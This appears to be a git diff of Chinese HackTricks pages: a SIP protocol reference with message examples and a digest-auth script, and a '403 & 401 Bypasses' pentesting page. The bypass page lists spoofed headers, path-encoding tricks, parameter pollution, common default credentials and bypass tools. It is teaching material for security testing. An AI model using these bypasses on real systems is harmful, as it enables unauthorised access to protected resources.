4. **MESSAGE**在RFC 3428中定义MESSAGE方法用于**在SIP用户代理之间发送即时消息**使得在SIP框架内进行基于文本的通信成为可能
5. **UPDATE**在RFC 3311中定义UPDATE方法允许**在不影响现有对话状态的情况下修改会话**。这对于在进行中的呼叫中更新会话参数(例如编解码器或媒体类型)非常有用。
6. **PUBLISH**在RFC 3903中定义PUBLISH方法由用户代理用于**向服务器发布事件状态信息**,使其对其他感兴趣方可用。
### SIP响应代码
- **1xx临时响应**:这些响应表示请求已收到,服务器正在继续处理它。
- 100 Trying已收到请求服务器正在处理。
- 180 Ringing被叫正在响铃并将接听电话。
- 183 Session Progress提供有关呼叫进展的信息。
- **2xx成功响应**:这些响应表示请求已成功接收、理解和接受。
- 200 OK请求成功服务器已完成。
- 202 Accepted请求已接受处理但尚未完成。
- **3xx重定向响应**:这些响应表示需要进一步操作才能满足请求,通常是通过联系另一个资源。
- 300 Multiple Choices有多个可用选项用户或客户端必须选择一个。
- 301 Moved Permanently请求的资源已被分配新的永久URI。
- 302 Moved Temporarily请求的资源暂时可在不同的URI处获得。
- 305 Use Proxy请求必须发送到指定的代理。
- **4xx客户端错误响应**:这些响应表示请求包含错误语法或服务器无法满足。
- 400 Bad Request请求格式错误或无效。
- 401 Unauthorized请求需要用户身份验证。
- 403 Forbidden服务器理解请求但拒绝执行。
- 404 Not Found服务器上未找到请求的资源。
- 408 Request Timeout服务器在准备等待的时间内未收到完整请求。
- 486 Busy Here被叫当前忙碌无法接听电话。
- **5xx服务器错误响应**:这些响应表示服务器未能满足有效请求。
- 500 Internal Server Error服务器在处理请求时遇到错误。
- 501 Not Implemented服务器不支持满足请求所需的功能。
- 503 Service Unavailable服务器当前无法处理请求因为正在维护或过载。
- **6xx全局失败响应**:这些响应表示任何服务器都无法满足请求。
- 600 Busy Everywhere所有可能的呼叫目的地都忙。
- 603 Decline被叫不希望参与呼叫。
- 604 Does Not Exist Anywhere请求的资源在网络中任何地方都不可用。
## 例子
* **1xx临时响应**:这些响应表示请求已被接收,服务器正在继续处理。
* 100 Trying: 请求已被接收,服务器正在处理。
* 180 Ringing: 被叫方正在被提醒,将接听电话。
* 183 Session Progress: 提供有关呼叫进展的信息。
* **2xx成功响应**:这些响应表示请求已成功接收、理解和接受。
* 200 OK: 请求成功,服务器已满足请求。
* 202 Accepted: 请求已被接受处理,但尚未完成。
* **3xx重定向响应**:这些响应表示需要进一步的操作来满足请求,通常是通过联系替代资源。
* 300 Multiple Choices: 有多个可用选项,用户或客户端必须选择一个。
* 301 Moved Permanently: 请求的资源已分配新的永久URI。
* 302 Moved Temporarily: 请求的资源暂时可在不同的URI上获得。
* 305 Use Proxy: 请求必须发送到指定的代理。
* **4xx客户端错误响应**:这些响应表示请求包含错误的语法或服务器无法满足请求。
* 400 Bad Request: 请求格式错误或无效。
* 401 Unauthorized: 请求需要用户身份验证。
* 403 Forbidden: 服务器理解请求但拒绝满足。
* 404 Not Found: 请求的资源在服务器上未找到。
* 408 Request Timeout: 服务器在准备等待的时间内未收到完整请求。
* 486 Busy Here: 被叫方当前忙碌,无法接听电话。
* **5xx服务器错误响应**:这些响应表示服务器未能满足有效请求。
* 500 Internal Server Error: 服务器在处理请求时遇到错误。
* 501 Not Implemented: 服务器不支持满足请求所需的功能。
* 503 Service Unavailable: 服务器当前无法处理请求,因维护或过载。
* **6xx全局失败响应**:这些响应表示请求无法被任何服务器满足。
* 600 Busy Everywhere: 呼叫的所有可能目的地都忙。
* 603 Decline: 被叫方不希望参与呼叫。
* 604 Does Not Exist Anywhere: 请求的资源在网络中不可用。
## 示例
### SIP INVITE 示例
```
@ -110,39 +113,39 @@ a=rtpmap:0 PCMU/8000te
```
<details>
<summary>每个参数解释</summary>
<summary>每个参数解释</summary>
1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - 此行指示方法INVITE、请求 URIsip:[jdoe@example.com](mailto:jdoe@example.com))和 SIP 版本SIP/2.0)。
2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - Via 头指定传输协议UDP和客户端地址pc33.example.com。"branch" 参数用于循环检测和事务匹配。
1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - 该行指示方法INVITE、请求URIsip:[jdoe@example.com](mailto:jdoe@example.com)和SIP版本SIP/2.0)。
2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - Via头指定传输协议UDP和客户端地址pc33.example.com。"branch"参数用于循环检测和事务匹配。
3. **Max-Forwards**: `Max-Forwards: 70` - 此头字段限制请求可以被代理转发的次数,以避免无限循环。
4. **To**: `To: John Doe <sip:jdoe@example.com>` - To 头指定呼叫的接收者包括其显示名称John DoeSIP URIsip:[jdoe@example.com](mailto:jdoe@example.com))。
5. **From**: `From: Jane Smith <sip:jsmith@example.org>;tag=1928301774` - From 头指定呼叫的发送者包括其显示名称Jane SmithSIP URIsip:[jsmith@example.org](mailto:jsmith@example.org))。"tag" 参数用于唯一标识发送者在对话中的角色。
6. **Call-ID**: `Call-ID: a84b4c76e66710` - Call-ID 头唯一标识两个用户代理之间的呼叫会话。
7. **CSeq**: `CSeq: 314159 INVITE` - CSeq 头包含一个序列号和请求中使用的方法。它用于将响应与请求匹配并检测消息的乱序。
8. **Contact**: `Contact: <sip:jsmith@pc33.example.com>` - Contact 头提供了一个直接路由到发送者,可用于后续请求和响应。
9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - User-Agent 头提供有关发送者的软件或硬件的信息,包括其名称和版本。
10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - Allow 头列出发送者支持的 SIP 方法。这有助于接收方了解在通信期间可以使用哪些方法。
11. **Content-Type**: `Content-Type: application/sdp` - Content-Type 头指定消息体的媒体类型,在本例中为 SDP会话描述协议
12. **Content-Length**: `Content-Length: 142` - Content-Length 头指示消息体的大小(以字节为单位)。
13. **消息体**: 消息体包含 SDP 会话描述,其中包括有关所提议会话的媒体类型、编解码器和传输协议的信息。
4. **To**: `To: John Doe <sip:jdoe@example.com>` - To头指定通话的接收者包括他们的显示名称John DoeSIP URIsip:[jdoe@example.com](mailto:jdoe@example.com))。
5. **From**: `From: Jane Smith <sip:jsmith@example.org>;tag=1928301774` - From头指定通话的发送者包括他们的显示名称Jane SmithSIP URIsip:[jsmith@example.org](mailto:jsmith@example.org))。"tag"参数用于唯一标识发送者在对话中的角色。
6. **Call-ID**: `Call-ID: a84b4c76e66710` - Call-ID头唯一标识两个用户代理之间的通话会话。
7. **CSeq**: `CSeq: 314159 INVITE` - CSeq头包含一个序列号和请求中使用的方法。它用于将响应与请求匹配并检测乱序消息
8. **Contact**: `Contact: <sip:jsmith@pc33.example.com>` - Contact头提供发送者的直接路径,可用于后续请求和响应。
9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - User-Agent头提供有关发送者的软件或硬件的信息包括其名称和版本。
10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - Allow头列出发送者支持的SIP方法。这有助于接收者了解在通信中可以使用哪些方法。
11. **Content-Type**: `Content-Type: application/sdp` - Content-Type头指定消息体的媒体类型,在这种情况下为SDP会话描述协议
12. **Content-Length**: `Content-Length: 142` - Content-Length头指示消息体的大小以字节为单位
13. **Message Body**: 消息体包含SDP会话描述其中包括有关媒体类型、编解码器和提议会话的传输协议的信息。
* `v=0` - 协议版本SDP 的版本 0
* `v=0` - 协议版本SDP为0
* `o=jsmith 2890844526 2890842807 IN IP4 pc33.example.com` - 发起者和会话标识符
* `s=-` - 会话名称(单个连字符表示没有会话名称)
* `c=IN IP4 pc33.example.com` - 连接信息(网络类型、地址类型和地址)
* `t=0 0` - 时间信息(开始和结束时间0 0 表示会话没有边界)
* `m=audio 49170 RTP/AVP 0` - 媒体描述(媒体类型、端口号、传输协议和格式列表)。在本例中,它指定使用 RTP/AVP实时传输协议/音频视频配置文件)和格式 0PCMU/8000的音频流。
* `a=rtpmap:0 PCMU/8000` - 将格式0映射到编解码器PCMU及其时钟速率8000 Hz的属性
* `t=0 0` - 时间信息(开始和停止时间0 0表示会话没有边界)
* `m=audio 49170 RTP/AVP 0` - 媒体描述(媒体类型、端口号、传输协议和格式列表)。在这种情况下它指定使用RTP/AVP实时传输协议/音视频配置文件)和格式0PCMU/8000的音频流。
* `a=rtpmap:0 PCMU/8000` - 属性将格式0映射到编解码器PCMU及其时钟频率8000 Hz
</details>
### SIP REGISTER 示例
REGISTER 方法用于在会话初始化协议SIP中允许用户代理UA如 VoIP 电话或软电话,**向 SIP 注册服务器注册其位置**。此过程使服务器知道**在哪里路由到注册用户的传入 SIP 请求**。注册服务器通常是 SIP 代理服务器或专用注册服务器的一部分。
REGISTER方法用于会话发起协议SIP允许用户代理UA例如VoIP电话或软电话**向SIP注册服务器注册其位置**。此过程让服务器知道**将传入的SIP请求路由到注册用户的位置**。注册服务器通常是SIP代理服务器或专用注册服务器的一部分。
以下是涉及 REGISTER 认证过程中的 SIP 消息的详细示例:
以下是REGISTER认证过程中的SIP消息的详细示例
1. UA 到注册服务器的初始 **REGISTER** 请求:
1. UA到注册服务器的初始**REGISTER**请求:
```yaml
REGISTER sip:example.com SIP/2.0
Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@ -155,9 +158,9 @@ Contact: <sip:alice@192.168.1.100:5060>;expires=3600
Expires: 3600
Content-Length: 0
```
这个初始的 REGISTER 消息由 UAAlice发送到注册服务器。它包括重要信息如期望的注册持续时间Expires用户的 SIP URIsip:[alice@example.com](mailto:alice@example.com)),以及用户的联系地址sip:alice@192.168.1.100:5060
这个初始的 REGISTER 消息由 UAAlice发送到注册服务器。它包含重要信息例如所需的注册持续时间Expires、用户的 SIP URIsip:[alice@example.com](mailto:alice@example.com))和用户的联系地址sip:alice@192.168.1.100:5060
2. 注册服务器返回 **401 未经授权** 响应:
2. **401 Unauthorized** 来自注册服务器的响应:
```css
cssCopy codeSIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@ -168,9 +171,9 @@ CSeq: 1 REGISTER
WWW-Authenticate: Digest realm="example.com", nonce="abcdefghijk", algorithm=MD5, qop="auth"
Content-Length: 0
```
注册服务器会响应一个包含"401 未授权"消息的信息,其中包括一个"WWW-Authenticate"头部。该头部包含了UA进行身份验证所需的信息比如**认证领域、随机数和算法**。
注册服务器以“401 Unauthorized”消息响应其中包含“WWW-Authenticate”头。该头包含UA进行身份验证所需的信息例如**身份验证域、随机数和算法**。
3. 使用认证凭据的REGISTER请求
3. 带有**身份验证凭据**的REGISTER请求
```vbnet
REGISTER sip:example.com SIP/2.0
Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@ -184,9 +187,9 @@ Expires: 3600
Authorization: Digest username="alice", realm="example.com", nonce="abcdefghijk", uri="sip:example.com", response="65a8e2285879283831b664bd8b7f14d4", algorithm=MD5, cnonce="lmnopqrst", qop=auth, nc=00000001
Content-Length: 0
```
UA发送另一个REGISTER请求这次包括使用提供的信息和用户密码计算出的必要凭据,如用户名、领域、随机数和响应值的**"Authorization"头**。
UA发送另一个REGISTER请求这次包括**“Authorization”头带有必要的凭据如用户名、域、随机数和使用提供的信息和用户密码计算的响应值**。
这是**Authorization响应**的计算方式:
是**Authorization响应**的计算方式:
```python
import hashlib
@ -219,7 +222,7 @@ qop = "auth"
response = calculate_sip_md5_response(username, password, realm, method, uri, nonce, nc, cnonce, qop)
print(f"MD5 response value: {response}")
```
4. **来自注册服务器的成功注册**响应:
4. **成功注册** 响应来自注册服务器
```yaml
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@ -231,12 +234,28 @@ Contact: <sip:alice@192.168.1.100:5060>;expires=3600
Expires: 3600
Content-Length: 0
```
在注册服务器验证提供的凭据后,**它发送一个"200 OK"响应以指示注册成功**。响应包括已注册的联系信息和注册的到期时间。此时用户代理Alice已成功注册到SIP注册服务器并且可以将针对Alice的传入SIP请求路由到适当的联系地址。
在注册服务器验证提供的凭据后,**它发送一个“200 OK”响应以指示注册成功**。响应包括注册的联系信息和注册的过期时间。此时用户代理Alice已成功注册到SIP注册服务器针对Alice的传入SIP请求可以路由到适当的联系地址。
### 通话示例
### 呼叫示例
<figure><img src="../../../.gitbook/assets/image (1101).png" alt=""><figcaption></figcaption></figure>
{% hint style="info" %}
虽然没有提到但用户B需要在能够接收呼叫之前向Proxy 2发送**REGISTER消息**。
虽然没有提到但用户B需要在能够接听电话之前向代理2发送**REGISTER消息**。
{% endhint %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

112
network-services-pentesting/pentesting-web/403-and-401-bypasses.md
View file

@ -1,38 +1,39 @@
# 403 & 401 Bypasses
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从侦察到报告使用20多种工具和功能进行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## HTTP动词/方法模糊
## HTTP 动词/方法模糊测试
尝试使用**不同的动词**访问文件:`GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
尝试使用 **不同的动词** 访问文件:`GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
* 检查响应头,也许会提供一些信息。例如,对**HEAD**的**200响应**带有`Content-Length: 55`表示**HEAD动词可以访问信息**。但您仍然需要找到一种方法来提取该信息。
* 使用类似`X-HTTP-Method-Override: PUT`的HTTP头可以覆盖使用的动词。
* 使用**`TRACE`**动词,如果非常幸运,也许在响应中您还可以看到由中间代理添加的**头信息**,这可能很有用。
* 检查响应头,可能会提供一些信息。例如,**HEAD 的 200 响应**,带有 `Content-Length: 55`,意味着 **HEAD 动词可以访问信息**。但你仍然需要找到一种方法来提取该信息。
* 使用 HTTP 头,如 `X-HTTP-Method-Override: PUT` 可以覆盖所使用的动词。
* 使用 **`TRACE`** 动词,如果你非常幸运,可能在响应中也能看到 **中间代理添加的头**,这可能会很有用。
## HTTP头模糊
## HTTP 头模糊测试
* 将**Host头部更改**为某个任意值([在这里有效](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31)
* 尝试[**使用其他用户代理**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt)访问资源。
* **模糊HTTP头部**尝试使用HTTP代理**头部**、HTTP身份验证基本和NTLM暴力破解仅使用少量组合和其他技术。为了执行所有这些操作我创建了工具[**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)。
* **更改 Host 头** 为某个任意值 ([在这里有效](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
* 尝试 [**使用其他用户代理**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) 访问资源。
* **模糊测试 HTTP 头**:尝试使用 HTTP 代理 **头**、HTTP 基本身份验证和 NTLM 暴力破解(仅使用少量组合)及其他技术。为此,我创建了工具 [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass)。
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
@ -48,20 +49,21 @@
* `X-ProxyUser-Ip: 127.0.0.1`
* `Host: localhost`
如果路径受到保护,您可以尝试使用以下其他头部绕过路径保护:
如果 **路径受到保护**,你可以尝试使用这些其他头来绕过路径保护:
* `X-Original-URL: /admin/console`
* `X-Rewrite-URL: /admin/console`
* 如果页面**在代理后面**,也许是代理阻止您访问私人信息。尝试滥用[**HTTP请求劫持**](../../pentesting-web/http-request-smuggling/) **或** [**逐跳头部**](../../pentesting-web/abusing-hop-by-hop-headers.md)**。**
* 在模糊**HTTP方法**时,模糊[**特殊HTTP头部**](special-http-headers.md)。
* **删除Host头部**,也许您将能够绕过保护。
* 如果页面在 **代理后面**,可能是代理阻止你访问私有信息。尝试利用 [**HTTP 请求走私**](../../pentesting-web/http-request-smuggling/) **或** [**逐跳头**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
* 模糊测试 [**特殊 HTTP 头**](special-http-headers.md) 寻找不同的响应。
* **在模糊测试 HTTP 方法时模糊测试特殊 HTTP 头**
* **移除 Host 头**,也许你将能够绕过保护。
## 路径**模糊**
## 路径 **模糊测试**
如果_/path_被阻止
如果 _/path_ 被阻止:
* 尝试使用_**/**_**%2e/path \_(如果访问被代理阻止,这可能绕过保护)。也尝试**\_\*\* /%252e\*\*/path双URL编码**
* 尝试**Unicode绕过**_/**%ef%bc%8f**path_URL编码字符类似于“/”因此当解码后将是_//path_也许您已经绕过了_path_名称检查
* 尝试使用 _**/**_**%2e/path \_(如果访问被代理阻止,这可能绕过保护)。也尝试**\_\*\* /%252e\*\*/pathURL 编码)
* 尝试 **Unicode 绕过**_/**%ef%bc%8f**path_URL 编码字符类似于 "/"),因此当重新编码时,它将变为 _//path_,也许你已经绕过了 _/path_ 名称检查
* **其他路径绕过**
* site.com/secret > HTTP 403 Forbidden
* site.com/SECRET > HTTP 200 OK
@ -73,43 +75,44 @@
* site.com/.;/secret > HTTP 200 OK
* site.com//;//secret > HTTP 200 OK
* site.com/secret.json > HTTP 200 OK (ruby)
* 在以下情况下使用所有[**此列表**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt)
* 在以下情况下使用 [**此列表**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Unicode.txt)
* /FUZZsecret
* /FUZZ/secret
* /secretFUZZ
* **其他API绕过**
* **其他 API 绕过**
* /v3/users\_data/1234 --> 403 Forbidden
* /v1/users\_data/1234 --> 200 OK
* {“id”:111} --> 401 Unauthriozied
* {“id”:111} --> 401 Unauthorized
* {“id”:\[111]} --> 200 OK
* {“id”:111} --> 401 Unauthriozied
* {“id”:111} --> 401 Unauthorized
* {“id”:{“id”:111\}} --> 200 OK
* {"user\_id":"\<legit\_id>","user\_id":"\<victims\_id>"} (JSON参数污染)
* {"user\_id":"\<legit\_id>","user\_id":"\<victims\_id>"} (JSON 参数污染)
* user\_id=ATTACKER\_ID\&user\_id=VICTIM\_ID (参数污染)
## **参数操纵**
## **参数操控**
* 更改 **参数值**:从 **`id=123` --> `id=124`**
* 向URL添加额外参数`?`**`id=124` —-> `id=124&isAdmin=true`**
* 除参数
* 重新排参数
* 向 URL 添加额外参数:`?`**`id=124` —-> `id=124&isAdmin=true`**
* 除参数
* 重新排参数
* 使用特殊字符。
* 在参数中执行边界测试 — 提供值如 _-234__0__99999999_只是一些示例值)。
* 在参数中执行边界测试 — 提供值如 _-234__0__99999999_仅为一些示例值)。
## **协议版本**
如果使用 HTTP/1.1 **尝试使用 1.0**,甚至测试是否**支持 2.0**。
如果使用 HTTP/1.1 **尝试使用 1.0**,甚至测试是否 **支持 2.0**
## **其他绕过方式**
## **其他绕过**
* 获取域的 **IP****CNAME**,尝试**直接联系**
* 尝试**压力测试服务器**发送常见的 GET 请求([这个家伙在 Facebook 上成功了](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)
* 获取域的 **IP****CNAME** 并尝试 **直接联系**
* 尝试 **给服务器施加压力**,发送常见的 GET 请求 ([这对这个人和 Facebook 有效](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125))
* **更改协议**:从 http 到 https或从 https 到 http
* 前往 [**https://archive.org/web/**](https://archive.org/web/) 并检查过去该文件是否**全球可访问**。
* 访问 [**https://archive.org/web/**](https://archive.org/web/) 并检查过去该文件是否 **全球可访问**
## **暴力破解**
* **猜测密码**:测试以下常见凭据。您了解受害者的情况吗或者CTF挑战的名称?
* [**暴力破解**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**** 尝试基本、摘要和NTLM身份验证。
* **猜测密码**:测试以下常见凭据。你对受害者了解些什么?或者 CTF 挑战的名称?
* [**暴力破解**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** 尝试基本、摘要和 NTLM 身份验证。
{% code title="常见凭据" %}
```
@ -124,31 +127,32 @@ guest guest
```
{% endcode %}
## 自动工具
## 自动工具
* [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
* [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
* [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)
* [Burp扩展 - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
* [NoMoreForbidden](https://github.com/akinerk/NoMoreForbidden)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,具有从侦察到报告的20多种工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,提供20多个工具和功能从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

341
network-services-pentesting/pentesting-web/README.md
View file

@ -1,30 +1,31 @@
# 80,443 - Pentesting Web Methodology
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要攻破不可攻破的系统 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
## 基本信息
Web服务是最**常见和广泛的服务**,存在许多**不同类型的漏洞**
网络服务是最 **常见和广泛的服务**,存在许多 **不同类型的漏洞**
**默认端口:** 80HTTP443HTTPS
**默认端口:** 80 (HTTP)443(HTTPS)
```bash
